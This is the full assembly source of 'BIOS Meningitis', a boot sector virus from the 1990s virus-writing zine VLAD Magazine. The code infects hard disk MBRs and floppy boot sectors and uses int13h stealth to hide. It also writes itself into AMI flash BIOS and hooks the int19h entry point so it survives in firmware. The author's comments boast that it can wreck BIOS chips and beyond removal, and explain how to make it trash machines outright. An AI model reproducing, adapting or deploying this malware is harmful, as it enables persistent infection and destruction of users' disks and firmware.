VLAD Magazine - Issue #1 - ARTICLE.4_4 - BIOS Meningitis Virus Source Code

;.........................................................................
;
;                    -=[ BIOS Meningitis ]=-
;                                               Qark/VLAD
;
;
;  Basic boot sector virus with a twist.
;
;  The worlds first flash BIOS infecting virus!
;
;  I _just_ fit all this into 512 bytes.  Infact there is only four bytes
;  spare... there wasn't even enough room for the name!  It used to copy
;  the partition table to the end of the virus but that is 64 bytes that
;  just couldn't spared, so now you if you boot from a floppy disk, the
;  hard disk won't be accessible.  But it's a full stealth virus apart
;  from that.
;
;  If you have flash BIOS on your computer there is a chance it will fuck
;  it up!  I'm talking wiped BIOS chip type fucked!  You WONT be able to
;  remove this virus!!!
;
;  The results of any tests of this with flash BIOS would be appreciated.
;
;  Assemble with A86 as always.
;
;.........................................................................


;On entry to the boot sector DL=Drive booted from.

    org     0

    mov     si,7c00h

    xor     ax,ax
    mov     es,ax

    cli
    mov     ss,ax                   ;Setup the stack
    mov     sp,si
    sti

    mov     ds,ax                   ;DS,CS,ES,SS=0

;***    40:[13] -       memory in k's   -  reduce by one or so          ***

    dec     word ptr [413h]         ;0:413 = Memory in K,  Sub one K.

    int     12h                     ;Get memory into AX
                    ;Since memory is in K we have to
                    ;multiply by 1024.  To do that we
                    ;would SHL AX,10.  But because we are
                    ;looking for the segment that takes
                    ;4 bits off the equation.

    mov     cl,6
    shl     ax,cl                   ;Thus SHL AX,6
    mov     es,ax                   ;ES = Virus Segment


;***    read virus sector into TOM  (top of memory)     ***

    xor     di,di
    mov     cx,200h
    cld
    rep     movsb                   ;Move virus to ES:0

    mov     ax,word ptr [13h*4]     ;Get int13h from vector table.
    mov     word ptr es:[offset i13],ax
    mov     ax,word ptr [13h*4+2]
    mov     word ptr es:[offset i13+2],ax

    mov     word ptr [13h*4],offset handler
    mov     word ptr [13h*4+2],es

already_resident:

    push    es
    mov     ax,offset restart
    push    ax
    retf

Restart:
    ;Load the original bootsector from the end of the root directory and
    ;execute it.
    xor     ax,ax
    call    int13h

    xor     ax,ax
    mov     es,ax
    mov     bx,7c00h                ;Where it's meant to be.

    mov     cx,2                    ;Read HD boot strap from MBR.
    xor     dh,dh
    mov     ax,201h                 ;Read one sector from root directory.
    cmp     dl,80h
    jae     MBR_Loader
    ;load up floppy
    mov     cl,14                   ;Cylinder=0, Sector=14
    mov     dh,1                    ;Head=1

MBR_Loader:
    call    int13h

    push    dx                      ;DL=Drive we are at.

    cmp     byte ptr cs:flash_done,1   ;flash is already infected.
    je      flash_resident

    call    flash_BIOS              ;Infect flash BIOS if any.

Flash_resident:

    pop     dx

    db      0eah                    ;JMPF   0000:7C00H
    dw      7c00h
    dw      0

Stealth:

    mov     cx,2
    mov     ax,201h
    cmp     dl,80h
    jae     hd_stealth
    mov     cl,14
    mov     dh,1
hd_stealth:
    call    int13h
    jmp     pop_exit
res_test:
    xchg    ah,al
    iret
Handler:
    cmp     ax,0abbah
    je      res_test
    cmp     ah,2            ;Reading the first sector ?
    jne     jend
    cmp     cx,1
    jne     jend
    cmp     dh,0
    jne     jend

try_infect:

    call    int13h
    jc      jend

    pushf
    push    ax
    push    bx
    push    cx
    push    dx
    push    si
    push    di
    push    es
    push    ds

    ;Test if already infected.

    cmp     word ptr es:[bx + offset marker],'LV'
    je      stealth                 ;Already infected.

    cmp     dl,80h                  ;C:
    jb      infect_floppy

    mov     cx,2                    ;Sector 2 - Empty MBR space.
    xor     dh,dh
    jmp     write_virus

Infect_Floppy:
    ;Store at end of root directory for floppy drives.
    ;(Will fuck up on 360k but I dont give a shit!)

    mov     cx,14                   ;Cylinder=0, Sector=14
    mov     dh,1                    ;Head=1

Write_Virus:
    ;Write original boot sector to spare room.

    mov     ax,301h
    call    int13h
    jc      pop_exit

    ;The virus is written at this point.

    push    cs
    pop     es

    mov     byte ptr cs:flash_done,0

    xor     bx,bx
    mov     ax,301h                 ;Write virus.
    mov     cx,1
    xor     dh,dh
    call    int13h

Pop_Exit:
    pop     ds
    pop     es
    pop     di
    pop     si
    pop     dx
    pop     cx
    pop     bx
    pop     ax
    popf

    retf    2

jend:
    db      0eah                    ;Stands for Jmpf
    i13     dd      0               ;The original int13h


Int13h  proc    near

    pushf
    call    dword ptr cs:[i13]
    ret

Int13h  endp

Marker  db   'VLAD'                     ;Running out of room so small
                    ;marker.


Flash_BIOS      Proc    Near

;               Flash BIOS infection (c) 1994 Qark/VLAD!

;Disclaimer: If any of this wrecks your computer that's your bad luck
;because you know this is dangerous code.

;I just hope that AMIFLASH is loaded at boot and isn't a driver.  Since it's
;written by a BIOS maker you'd think so...


    mov     ax,0e000h               ;Get flash BIOS number.
    int     16h                     ;Test for its presence.
    jc      no_flash_bios
    cmp     al,0fah                 ;<-- gotta test this
    jne     no_flash_bios

Infect_Flash:

    ;We are now working with AMIFLASH!

    ;First we'll find a nice place to store our virus.
    ; We'll scan between F000-FFFF where BIOS is normally stored for
    ; a 1K chunk of consecutive zeros.  (We might only need half a K
    ; but I'm overplanning)

    mov     ax,0f000h               ;ROM BIOS segment
    mov     ds,ax

New_segment:

    xor     si,si
    xor     dx,dx

ok_new_segment:

    inc     ax
    mov     ds,ax

    cmp     ax,0fff0h               ;No room for our virus.
    je      no_flash_BIOS
Test16:
    cmp     word ptr [si],0         ;Scan words
    jne     new_segment

    inc     dx                      ;DX is our free room counter.
    cmp     dx,512                  ;1024 byte buffer found (512x2)
    je      found_storage

    inc     si
    inc     si                      ;Coz we are messing with words.

    cmp     si,16                   ;We are going up in paragraphs.
    je      ok_new_segment
    jmp     test16


Found_storage:
    sub     ax,40h                  ;Sub 1K (40hx16=1024)
    mov     ds,ax                   ;Coz we are using segments

    mov     ax,0e001h               ;Chipset save requirement.
    int     16h

    ;BX=Number of bytes to Save Chipset.

    cmp     bx,512
    jbe     save_chipset

    ;We won't bother saving the chipset because it takes up more room
    ;than our virus buffer can store.  Fuck em :)

    mov     byte ptr cs:chipset,1   ;Indicate we haven't saved anything.

    jmp     write_enable
No_Flash_BIOS:
    ret
save_chipset:
    mov     byte ptr cs:chipset,0   ;We've saved stuff.

    mov     al,2
    push    cs
    pop     es                      ;ES=CS
    mov     di,offset buffer
    int     16h                     ;Chipset Status to ES:DI

write_enable:

    mov     al,5
    int     16h                     ;Raise Voltage (this may take time).

    mov     al,7                    ;Flash Write Enable.
    int     16h

    ;Flash Memory is now writable.  I am working on nothing here
    ;so I'll assume you just write to it normally and it'll be
    ;put there.   If you were into writing destructive payloads
    ;this would be the mother of them all.  Just load CX with 0ffffh
    ;to trash their computer.  Also, leaving the computer in this
    ;state for extended periods could cause damage (Dunno ? Their
    ;electricity bill would go up at least :)

    push    ds
    pop     es                      ;DS=ES=Place to put virus.

    xor     di,di
    mov     cx,512                  ;<-- FFFF = trouble!
    push    cs
    pop     ds                      ;DS=CS
    xor     si,si
    cld
    rep     movsb                   ;Move our virus into BIOS.

    ;Hopefully our virus is written ?

    ;Ok, I looked into this carefully.  At bootup int19h points
    ;into the BIOS but thereafter is grabbed by various programs
    ;(Dunno why, its the shittiest interrupt out).  So, if you debug
    ;right now it'll point into some shadowed area or else into
    ;segment 70h, but it won't at bootup which is the only time boot
    ;sector viruses get executed so all is cool.

    ;What we'll do is modify the actual bytes at the entry point to
    ;the interrupt.  You might think I should do something else but
    ;I can't think of any other way of hooking an interrupt at bootup.

    ;Priest-P/S reckoned I should just store my virus in the Flash
    ;and let the bootvirus just jump to it or something but then
    ;it's not really infected methinks.  He also suggested I just modify
    ;the int13h entry point and restore the bytes etc.  Well as you can
    ;see from the involved code needed just to write to flash I think
    ;that with a common interrupt like int13h it isn't feasible.

    ;Get Segment:Offset of original int19handler

    mov     bx,es                   ;BX=Virus Segment
    xor     ax,ax
    mov     ds,ax                   ;DS=Vector Table.
    mov     di,word ptr [19h*4]     ;Offset of int19h
    mov     es,word ptr [19h*4+2]   ;Segment of 19h

    ;Write a JMP FAR at the int19h entry point.
    mov     al,0eah
    stosb
    mov     ax,offset int19handler
    stosw
    mov     ax,bx
    stosw                           ;Creates a JMPF INT19HANDLER at the
                    ;int19h entry point.

    mov     ax,0e004h               ;Lower Voltage.
    int     16h

    mov     al,6                    ;Write Protect.
    int     16h

    cmp     byte ptr cs:chipset,0
    jne     No_Flash_BIOS           ;We've done for this one.

    push    cs
    pop     es                      ;ES=CS

    mov     al,3
    mov     di,offset buffer        ;Restore all their shit.
    int     16h
    jmp     no_flash_bios

chipset         db      0       ;1=chipset not saved
flash_done      db      0       ;1=loaded from flash.

;This is our own int19h handler.  The original sux because it isn't infected.
;(Strange logic :)
Int19Handler    Proc    Near

    xor     ax,ax
    mov     es,ax           ;ES=0

    mov     ax,0abbah       ;ABBA - from Muriels Wedding.
    int     13h

    cmp     ax,0baabh       ;BAAB - I like these.
    jne     real_int19h

;We are currently before the boot here.  Lets install our virus before
;any boot sectors or anything get loaded.

    push    cs              ;DS=0
    pop     ds
    cld
    xor     si,si
    mov     di,7c00h
    mov     cx,512
    rep     movsb           ;Move our virus from BIOS into boot buffer.
    mov     dl,80h          ;Make it think its C:
    jmp     goto_Buffer     ;Execute it.

real_int19h:
    xor     ax,ax
    int     13h             ;Reset disk

    mov     cx,1
    mov     dh,0
    mov     ax,201h
    mov     bx,7c00h
    cmp     dl,0
    ja      hd_int19h

    int     13h             ;Read boot sector.
    jc      fix_hd

Goto_Buffer:
    mov     byte ptr es:[7c00h+offset flash_done],1

    db      0eah            ;JMPF 0000:7C00
    dw      7c00h
    dw      0
Fix_HD:
    mov     dl,80h          ;Boot from C:
HD_Int19h:
    xor     ax,ax
    int     13h             ;Reset controller.
    mov     ax,201h
    int     13h
    jc      fucked_boot
    jmp     Goto_Buffer

Fucked_boot:
    int     18h             ;Called when a boot ***** up

Int19Handler    EndP

Flash_BIOS      EndP

End_Virus:
    DupSize equ     510 - offset End_Virus
    db      DupSize dup (0)
    db      55h,0aah                        ;End of Sector Marker.

Buffer:                         ;512 bytes of storage space in here.